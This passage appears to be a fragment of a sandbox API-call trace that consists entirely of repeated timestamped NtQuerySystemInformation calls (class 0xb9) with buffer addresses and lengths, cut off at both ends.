ResultLength=0x0) [0231.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0231.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0231.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0231.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0231.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, 